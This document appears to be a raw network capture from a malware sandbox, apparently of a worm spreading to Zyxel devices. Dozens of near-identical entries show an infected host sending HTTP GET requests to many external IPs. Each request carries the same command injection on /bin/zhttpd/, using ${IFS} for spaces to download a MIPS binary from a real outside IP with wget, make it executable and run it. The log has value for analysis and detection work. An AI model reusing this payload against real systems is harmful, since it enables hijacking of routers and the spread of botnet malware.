                                                  Jan 19, 2024 18:23:58.100472927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4891192.168.2.135779665.82.213.213443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.100531101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4892192.168.2.135786434.20.123.1443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.100567102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4893192.168.2.1350824172.165.225.116443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.100594997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4894192.168.2.1355402136.137.125.30443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.100646973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4895192.168.2.133378874.121.164.130443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.100681067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4896192.168.2.1336516205.168.236.1443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.100719929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4897192.168.2.133890263.97.117.177443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.100744009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4898192.168.2.134981223.206.133.112443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.100799084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4899192.168.2.1356566138.134.218.23443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.100830078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4900192.168.2.1349974135.251.219.36443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.100862026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4901192.168.2.1359494148.189.168.142443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.100878000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4902192.168.2.1344514141.83.118.192443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.100931883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4903192.168.2.1345988110.238.122.245443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.100975990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4904192.168.2.134553453.102.244.70443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.100999117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4905192.168.2.1348096153.229.175.78443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.101102114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4906192.168.2.135649477.47.74.198443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.101140976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4907192.168.2.1350178126.250.87.169443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.101170063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4908192.168.2.134865020.23.238.76443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.101197958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4909192.168.2.134418812.163.21.232443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.101247072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4910192.168.2.1356270173.250.77.1443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.101274967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4911192.168.2.1338240163.184.182.109443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.101330996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4912192.168.2.133789812.226.220.192443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.101367950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4913192.168.2.1343886202.112.94.23443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.101397038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4914192.168.2.135842079.123.243.79443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.101460934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4915192.168.2.135422627.1.125.68443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.101485014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4916192.168.2.1345616216.169.137.201443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.101542950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4917192.168.2.1345676103.86.255.50443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.101587057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4918192.168.2.1353818116.105.172.49443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.101623058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4919192.168.2.1357194169.107.181.168443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.101680040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4920192.168.2.1347284177.42.194.149443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.101715088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4921192.168.2.1346382210.68.182.218443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.101748943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4922192.168.2.1345732182.149.223.124443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.101799011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4923192.168.2.133826274.113.19.199443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.101835966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4924192.168.2.1348906182.51.35.135443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.101865053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4925192.168.2.135232474.238.21.213443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.101900101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4926192.168.2.1333658142.200.26.74443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.101924896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4927192.168.2.1353126164.60.213.224443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.101965904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4928192.168.2.1350756154.11.180.145443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.101986885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4929192.168.2.135031820.203.54.76443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.102029085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4930192.168.2.1344016106.79.21.145443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.102076054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4931192.168.2.1333686114.16.196.191443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.102127075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4932192.168.2.134031673.145.93.12443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.102174997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4933192.168.2.1345478160.234.237.85443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.102210999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4934192.168.2.1352630105.159.254.15443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.102255106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4935192.168.2.1349224132.96.212.60443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.102302074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4936192.168.2.1359352132.247.237.226443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.102329969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4937192.168.2.1343072164.164.26.170443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.102359056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4938192.168.2.1339662188.70.183.239443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.102395058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4939192.168.2.1354430218.169.112.2443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.102426052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4940192.168.2.135487819.177.112.134443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.102524042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4941192.168.2.13468765.190.74.110443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.102576971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4942192.168.2.1356902139.231.62.187443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.102607965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4943192.168.2.134444468.85.206.104443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.102643013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4944192.168.2.1338086105.103.192.78443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.102790117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4945192.168.2.133638027.21.219.111443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.102837086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4946192.168.2.135281287.254.171.20443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.102874994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4947192.168.2.1333316160.102.151.139443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.102874994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4948192.168.2.134196087.24.177.93443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.102874994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4949192.168.2.1359334114.89.84.86443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.102874994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4950192.168.2.1348622178.210.238.152443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.102915049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4951192.168.2.1357532179.255.208.191443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.102938890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4952192.168.2.1332876177.139.189.13443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.102989912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4953192.168.2.13409988.85.184.74443
                                                  TimestampBytes transferredDirectionData
